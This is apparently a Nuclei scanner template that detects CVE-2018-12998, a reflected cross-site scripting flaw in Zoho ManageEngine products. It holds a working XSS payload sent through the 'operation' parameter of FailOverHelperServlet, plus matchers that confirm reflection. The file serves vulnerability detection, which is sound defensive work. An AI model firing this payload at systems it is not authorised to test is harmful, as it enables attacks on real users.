id: CVE-2018-12998

info:
  name: Zoho manageengine - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts  Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.
  reference:
    - https://github.com/unh3x/just4cve/issues/10
    - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12998
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-12998
    cwe-id: CWE-79
    epss-score: 0.97193
  tags: cve,cve2018,zoho,xss,manageengine,packetstorm
  metadata:
    max-request: 1

http:
  - method: GET
    path:
      - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html

# Enhanced by mp on 2022/08/18